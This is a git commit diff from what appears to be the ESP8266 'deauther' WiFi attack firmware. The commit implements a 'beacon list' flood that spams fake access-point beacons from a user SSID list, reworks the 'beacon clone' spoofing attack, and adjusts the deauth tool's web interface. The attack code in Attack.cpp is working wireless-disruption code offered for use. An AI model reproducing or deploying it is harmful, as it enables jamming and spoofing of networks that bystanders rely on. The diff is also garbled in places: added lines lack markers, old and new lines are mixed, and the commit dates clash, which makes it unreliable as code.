Implemented beacon list attack

and improved the json string generation
2025-12-23 07:29:20 -08:00 · 2017-02-27 12:41:59 +01:00
parent c8cee47355
commit 7e2dfcbf5a
13 changed files with 104 additions and 58 deletions
--- a/esp8266_deauther/APScan.cpp
+++ b/esp8266_deauther/APScan.cpp
@@ -92,7 +92,7 @@ String APScan::getResults(){
    json += "\"m\":\""+getAPMac(i)+"\",";
    json += "\"ss\":\""+getAPName(i)+"\",";
    json += "\"r\":"+(String)getAPRSSI(i)+",";
-    json += "\"e\":\""+(String)encryption[i]+"\",";
+    json += "\"e\":"+(String)encryption[i]+",";
    //json += "\"v\":\""+getAPVendor(i)+"\",";
    json += "\"se\":"+(String)getAPSelected(i);
    json += "}";
--- a/esp8266_deauther/Attack.cpp
+++ b/esp8266_deauther/Attack.cpp
@@ -11,6 +11,7 @@ void Attack::generate(){
  uint8_t _randomMacBuffer[6];
  beaconAdrs._clear();
  for(int i=0;i<macListLen;i++) channels[i] = random(1,12);
  do{
    getRandomVendorMac(_randomMacBuffer);
    for(int i=0;i<6;i++) _randomBeaconMac.setAt(_randomMacBuffer[i],i);
@@ -37,7 +38,7 @@ void Attack::buildDeauth(Mac _ap, Mac _client, uint8_t type, uint8_t reason){
  packet[24] = reason;
 }
-void Attack::buildBeacon(Mac _ap, Mac _client, String _ssid, int _ch, bool encrypt){
+void Attack::buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt){
  packetSize = 0;
  int ssidLen = _ssid.length();
  if(ssidLen>32) ssidLen = 32;
@@ -48,9 +49,6 @@ void Attack::buildBeacon(Mac _ap, Mac _client, String _ssid, int _ch, bool encry
  }
  for(int i=0;i<6;i++){
    //set target (client)
    //packet[4+i] = _client._get(i);
    packet[4+i] = _client._get(i);
    //set source (AP)
    packet[10+i] = packet[16+i] = _ap._get(i);
  }
@@ -150,7 +148,7 @@ void Attack::run(){
    }
  }
-  /* =============== Beacon Attack =============== */
+  /* =============== Beacon clone Attack =============== */
  if(isRunning[1] && currentMillis-prevTime[1] >= 100){
    if(debug) Serial.print("running "+(String)attackNames[1]+" attack");
    prevTime[1] = millis();
@@ -160,15 +158,13 @@ void Attack::run(){
        String _ssid = apScan.getAPName(a);
        int _ssidLen = _ssid.length();
        int _restSSIDLen = 32 - _ssidLen;
-        int _ch = apScan.getAPChannel(a);
+        //int _ch = apScan.getAPChannel(a);
        Mac _broadcast;
        _broadcast.set(0xFF,0xFF,0xFF,0xFF,0xFF,0xFF);
        //wifi_set_channel(_ch);
        for(int c=0;c<macListLen/apScan.selectedSum;c++){
          String _apName = _ssid;
          int _ch = channels[c];
          if(c < _restSSIDLen) for(int d=0; d < _restSSIDLen-c; d++) _apName += " ";//e.g. "SAMPLEAP   "
          else if(c < _restSSIDLen*2){
@@ -182,7 +178,7 @@ void Attack::run(){
            _apName += (String)c;//e.g. "SAMPLEAP        78"
          }
-          buildBeacon(beaconAdrs._get(c),_broadcast,_apName,_ch,apScan.getAPEncryption(a) != "none");
+          buildBeacon(beaconAdrs._get(c),_apName,_ch,apScan.getAPEncryption(a) != "none");
          if(send()) packetsCounter[1]++;
        }
@@ -204,6 +200,34 @@ void Attack::run(){
    }
  }
  /* =============== Beacon list Attack =============== */
  if(isRunning[2] && currentMillis-prevTime[2] >= 100){
    if(debug) Serial.print("running "+(String)attackNames[2]+" attack");
    prevTime[2] = millis();
    for(int a=0;a<ssidList.len;a++){
      String _ssid = ssidList.get(a);
      int _ch = channels[a];
      buildBeacon(beaconAdrs._get(a),_ssid,_ch,settings.attackEncrypted);
      if(send()) packetsCounter[2]++;
    }
    stati[2] = (String)(packetsCounter[2]*10)+"pkts/s";
    packetsCounter[2] = 0;
    macListChangeCounter++;
    if(macListChangeCounter/10 >= macChangeInterval){
      generate();
      macListChangeCounter = 0;
    }
    if(debug) Serial.println("done");
    if(settings.attackTimeout > 0){
      attackTimeoutCounter[2]++;
      if(attackTimeoutCounter[2]/10 > settings.attackTimeout) stop(2);
    }
  }
 }
 void Attack::start(int num){
@@ -213,8 +237,9 @@ void Attack::start(int num){
    prevTime[num] = millis();
    attackTimeoutCounter[num] = 0;
    if(debug) Serial.println("starting "+(String)attackNames[num]+" attack");
    if(num == 1 && isRunning[2]) stop(2);
    else if(num == 2 && isRunning[1]) stop(1);
  }else stop(num);
 }
 void Attack::stop(int num){
@@ -233,12 +258,10 @@ void Attack::stopAll(){
 String Attack::getResults(){
  if(debug) Serial.print("getting attacks JSON...");
  for(int i=0;i<attacksNum;i++) if(!isRunning[i]) stati[i] = "ready";
  if(apScan.getFirstTarget() < 0) stati[0] = stati[1] = "no AP";
-  else {
+  if(ssidList.len < 1) stati[2] = "no SSID";
    for(int i=0;i<attacksNum;i++){
      if(!isRunning[i]) stati[i] = "ready";
    }
  }
  int _selected;
  String json = "{ \"aps\": [";
--- a/esp8266_deauther/Attack.h
+++ b/esp8266_deauther/Attack.h
@@ -14,7 +14,7 @@ extern "C" {
 #include "Settings.h"
 #include "SSIDList.h"
-#define attacksNum 2
+#define attacksNum 3
 #define macListLen 64
 #define macChangeInterval 4
@@ -41,11 +41,11 @@ class Attack
  private:
    void buildDeauth(Mac _ap, Mac _client, uint8_t type, uint8_t reason);
-    void buildBeacon(Mac _ap, Mac _client, String _ssid, int _ch, bool encrypt);
+    void buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt);
    bool send();
    //attack declarations
-    const String attackNames[attacksNum] = {"deauth","beacon (clone)"/*,"beacon (list)"*/};
+    const String attackNames[attacksNum] = {"deauth","beacon (clone)","beacon (list)"};
    //attack infos
    String stati[attacksNum];
@@ -108,6 +108,7 @@ class Attack
    int macListChangeCounter = 0;
    int attackTimeoutCounter[attacksNum];
    int channels[macListLen];
 };
 #endif
--- a/esp8266_deauther/ClientScan.cpp
+++ b/esp8266_deauther/ClientScan.cpp
@@ -122,12 +122,12 @@ String ClientScan::getResults(){
  String json = "{ \"clients\":[";
  for(int i=0;i<results && i<maxClientScanResults;i++){
    json += "{";
-    json += "\"id\": "+(String)i+",";
+    json += "\"i\":"+(String)i+",";
-    json += "\"packets\": "+(String)getClientPackets(i)+",";
+    json += "\"p\":"+(String)getClientPackets(i)+",";
-    json += "\"mac\": \""+getClientMac(i).toString()+"\",";
+    json += "\"m\":\""+getClientMac(i).toString()+"\",";
-    json += "\"name\": \""+(String)nameList.get(getClientMac(i))+"\",";
+    json += "\"n\":\""+(String)nameList.get(getClientMac(i))+"\",";
-    json += "\"vendor\": \""+(String)getClientVendor(i)+"\",";
+    json += "\"v\":\""+(String)getClientVendor(i)+"\",";
-    json += "\"selected\": "+(String)getClientSelected(i);
+    json += "\"s\":"+(String)getClientSelected(i);
    json += "}";
    if((i!=results-1) && (i!=maxClientScanResults-1)) json += ",";
  }
--- a/esp8266_deauther/ClientScan.h
+++ b/esp8266_deauther/ClientScan.h
@@ -1,7 +1,7 @@
 #ifndef ClientScan_h
 #define ClientScan_h
-#define maxClientScanResults 30
+#define maxClientScanResults 40
 #include <ESP8266WiFi.h>
 #include "Mac.h"
--- a/esp8266_deauther/Settings.cpp
+++ b/esp8266_deauther/Settings.cpp
@@ -19,6 +19,7 @@ void Settings::load(){
    attackTimeout = eepromReadInt(attackTimeoutAdr);
    attackPacketRate = EEPROM.read(attackPacketRateAdr);
    clientScanTime = EEPROM.read(clientScanTimeAdr);
    attackEncrypted = (bool)EEPROM.read(attackEncryptedAdr);
  }
 }
@@ -35,6 +36,7 @@ void Settings::reset(){
  attackTimeout = 5*60;
  attackPacketRate = 10;
  clientScanTime = 15;
  attackEncrypted = false;
  if(debug) Serial.println("done");
@@ -57,6 +59,7 @@ void Settings::save(){
  EEPROM.write(attackPacketRateAdr, attackPacketRate);
  EEPROM.write(clientScanTimeAdr, clientScanTime);
  EEPROM.write(attackEncryptedAdr, attackEncrypted);
  EEPROM.commit();
  if(debug){
@@ -75,6 +78,7 @@ void Settings::info(){
  Serial.println("attack timeout: "+(String)attackTimeout);
  Serial.println("attack packet rate: "+(String)attackPacketRate);
  Serial.println("client scan time: "+(String)clientScanTime);
  Serial.println("attack SSID encrypted: "+(String)attackEncrypted);
 }
 String Settings::get(){
@@ -86,14 +90,14 @@ String Settings::get(){
  json += "\"attackTimeout\":"+(String)attackTimeout+",";
  json += "\"attackPacketRate\":"+(String)attackPacketRate+",";
  json += "\"clientScanTime\":"+(String)clientScanTime+",";
  json += "\"attackEncrypted\":"+(String)attackEncrypted+",";
  json += "\"nameList\":[";
  for(int i=0;i<nameList.len;i++){
    json += "{";
-    json += "\"id\":"+(String)i+",";
+    json += "\"n\":\""+nameList.getName(i)+"\",";
-    json += "\"name\":\""+nameList.getName(i)+"\",";
+    json += "\"m\":\""+nameList.getMac(i).toString()+"\",";
-    json += "\"mac\":\""+nameList.getMac(i).toString()+"\",";
+    json += "\"v\":\""+data_getVendor(nameList.getMac(i)._get(0), nameList.getMac(i)._get(1), nameList.getMac(i)._get(2))+"\"";
    json += "\"vendor\":\""+data_getVendor(nameList.getMac(i)._get(0), nameList.getMac(i)._get(1), nameList.getMac(i)._get(2))+"\"";
    json += "}";
    if(i!=nameList.len-1) json += ",";
  }
--- a/esp8266_deauther/Settings.h
+++ b/esp8266_deauther/Settings.h
@@ -20,6 +20,7 @@ extern NameList nameList;
 #define attackTimeoutAdr 1091
 #define attackPacketRateAdr 1093
 #define clientScanTimeAdr 1094
 #define attackEncryptedAdr 1095
 class Settings
 {
@@ -41,6 +42,7 @@ class Settings
    int attackPacketRate;
    int clientScanTime;
    bool attackEncrypted;
  private:
 };
--- a/esp8266_deauther/data.h
+++ b/esp8266_deauther/data.h
--- a/esp8266_deauther/esp8266_deauther.ino
+++ b/esp8266_deauther/esp8266_deauther.ino
@@ -18,7 +18,7 @@ extern "C" {
 #include "SSIDList.h"
 /* ========== DEBUG ========== */
-const bool debug = true;
+const bool debug = false;
 /* ========== DEBUG ========== */
 ESP8266WebServer server(80);
@@ -222,6 +222,10 @@ void saveSettings(){
  if(server.hasArg("timeout")) settings.attackTimeout = server.arg("timeout").toInt();
  if(server.hasArg("deauthReason")) settings.deauthReason = server.arg("deauthReason").toInt();
  if(server.hasArg("packetRate")) settings.attackPacketRate = server.arg("packetRate").toInt();
  if(server.hasArg("ssidEnc")){
    if(server.arg("ssidEnc") == "false") settings.attackEncrypted = false;
    else settings.attackEncrypted = true;
  }
  settings.save();
  server.send( 200, "text/json", "true" ); 
--- a/htmlfiles/attack.html
+++ b/htmlfiles/attack.html
@@ -48,10 +48,11 @@
 				If no client is selected, the packets are sent as broadcast!
 				<br><br>
 				<b>beacon [beacon flood attack]:</b><br>
-				Spams beacon frames with a similar SSID as the selected WiFi access point(s).
+				(clone:) spams beacon frames with a similar SSID as the selected WiFi access point(s).<br />
 				(list:) spams beacon frames with all SSIDs in the list below.
 			</p>
 			<br />
-			<p class="block bold">SSIDs: <button class="marginNull warnBtn" onclick="clearSSID()">clear</button> <button class="marginNull" onclick="randomSSID()">random</button> <button class="marginNull" onclick="addSSID()">add</button></p>
+			<p class="block bold">SSIDs: <span id="ssidCounter">0/64</span> <button class="marginNull warnBtn" onclick="clearSSID()">clear</button> <button class="marginNull" onclick="randomSSID()">random</button> <button class="marginNull" onclick="addSSID()">add</button></p>
 			<br />
 			<table>
 			</table>
@@ -65,6 +66,7 @@
 		var table = document.getElementsByTagName("table")[0];
 		var ssidList = document.getElementsByTagName("table")[1];
 		var saved = document.getElementById("saved");
 		var ssidCounter = document.getElementById("ssidCounter");
 		var resultInterval;
 		var res;
@@ -94,6 +96,8 @@
 						}
 						table.innerHTML = tr;
 						ssidCounter.innerHTML = res.ssid.length+"/64";
 						var tr = "<tr><th>Name</th><th>X</th></tr>";
 						for(var i=0;i<res.ssid.length;i++){
 							tr += "<tr>";
--- a/htmlfiles/clients.html
+++ b/htmlfiles/clients.html
@@ -59,8 +59,8 @@
 		var res;
 		function compare(a,b) {
-			if (a.packets > b.packets) return -1;
+			if (a.p > b.p) return -1;
-			if (a.packets < b.packets) return 1;
+			if (a.p < b.p) return 1;
 			return 0;
 		}
@@ -84,15 +84,15 @@
 				for(var i=0;i<res.clients.length;i++){
-					if(res.clients[i].selected) tr += '<tr class="selected">';
+					if(res.clients[i].s == 1) tr += '<tr class="selected">';
 					else tr += '<tr>';
-					tr += '<td>'+res.clients[i].packets+'</td>';
+					tr += '<td>'+res.clients[i].p+'</td>';
-					tr += '<td>'+res.clients[i].vendor+'</td>';
+					tr += '<td>'+res.clients[i].v+'</td>';
-					tr += '<td>'+res.clients[i].name+' <a class="blue" onclick="changeName('+res.clients[i].id+')">edit</a></td>';
+					tr += '<td>'+res.clients[i].n+' <a class="blue" onclick="changeName('+res.clients[i].i+')">edit</a></td>';
-					tr += '<td>'+res.clients[i].mac+'</td>';
+					tr += '<td>'+res.clients[i].m+'</td>';
-					if(res.clients[i].selected) tr += '<td><button class="marginNull selectedBtn" onclick="select('+res.clients[i].id+')">deselect</button></td>';
+					if(res.clients[i].s == 1) tr += '<td><button class="marginNull selectedBtn" onclick="select('+res.clients[i].i+')">deselect</button></td>';
-					else tr += '<td><button class="marginNull" onclick="select('+res.clients[i].id+')">select</button></td>';
+					else tr += '<td><button class="marginNull" onclick="select('+res.clients[i].i+')">select</button></td>';
 					tr += '</tr>';
 				}
@@ -130,7 +130,7 @@
 		}
 		function changeName(id){
-			var newName = prompt("Name for "+res.clients[id].mac);
+			var newName = prompt("Name for "+res.clients[id].m);
 			if(newName != null){
 				getResponse("setName.json?id="+id+"&name="+newName,function(responseText){
 					if(responseText == "true") getResults();
--- a/htmlfiles/index.html
+++ b/htmlfiles/index.html
@@ -81,10 +81,11 @@
 		}
 		function getEncryption(num){
-			if(num == 5) return "WEP";
+			if(num == 8) return "WPA*";
 			else if(num == 2) return "WPA";
 			else if(num == 4) return "WPA2";
-			else if(num == 8) return "WPA*";
+			else if(num == 2) return "WPA";
 			else if(num == 7) return "none";
 			else if(num == 5) return "WEP";
 		}
 		function getResults(){
--- a/htmlfiles/settings.html
+++ b/htmlfiles/settings.html
@@ -53,6 +53,10 @@
 			<input type="number" id="timeout" min="-1" max="65536">s
 			<p class="small">0 = no timeout</p>
 			<label for="ssidEnc">beacon encrypted:</label>
 			<input type="checkbox" name="ssidEnc" id="ssidEnc" value="true">
 			<br />
 			<label for="deauthReason">deauth reason:</label>
 			<input type="number" id="deauthReason" min="1" max="45">
 			<p class="small">reason codes: <a target="_blank" href="http://www.aboutcher.co.uk/2012/07/linux-wifi-deauthenticated-reason-codes/">click</a></p>
@@ -88,6 +92,7 @@
 		var packetRate = document.getElementById('packetRate');
 		var saved = document.getElementById('saved');
 		var clientNames = document.getElementById('clientNames');
 		var ssidEnc = document.getElementById('ssidEnc');
 		var res;
 		function getData(){
@@ -100,6 +105,7 @@
 				timeout.value = res.attackTimeout;
 				deauthReason.value = res.deauthReason;
 				packetRate.value = res.attackPacketRate;
 				ssidEnc.checked = res.attackEncrypted;
 				clientNames.innerHTML = "Client Names "+res.nameList.length+"/50";
@@ -108,10 +114,10 @@
 				for(var i=0;i<res.nameList.length;i++){
 					tr += '<tr>';
-					tr += '<td>'+res.nameList[i].mac+'</td>';
+					tr += '<td>'+res.nameList[i].m+'</td>';
-					tr += '<td>'+res.nameList[i].vendor+'</td>';
+					tr += '<td>'+res.nameList[i].v+'</td>';
-					tr += '<td>'+res.nameList[i].name+' <a class="blue" onclick="changeName('+res.nameList[i].id+')">edit</a></td>';
+					tr += '<td>'+res.nameList[i].n+' <a class="blue" onclick="changeName('+i+')">edit</a></td>';
-					tr += '<td><button class="marginNull warnBtn" onclick="deleteName('+res.nameList[i].id+')">x</button></td>';
+					tr += '<td><button class="marginNull warnBtn" onclick="deleteName('+i+')">x</button></td>';
 					tr += '</tr>';
 				}
@@ -121,7 +127,7 @@
 		}
 		function changeName(id){
-			var newName = prompt("Name for "+res.nameList[id].mac);
+			var newName = prompt("Name for "+res.nameList[id].m);
 			if(newName != null){
 				getResponse("editNameList.json?id="+id+"&name="+newName,function(responseText){
 					if(responseText == "true") getData();
@@ -146,6 +152,7 @@
 			url += "&timeout="+timeout.value;
 			url += "&deauthReason="+deauthReason.value;
 			url += "&packetRate="+packetRate.value;
 			url += "&ssidEnc="+ssidEnc.checked;
 			getResponse(url, function(responseText){
 				if(responseText == "true"){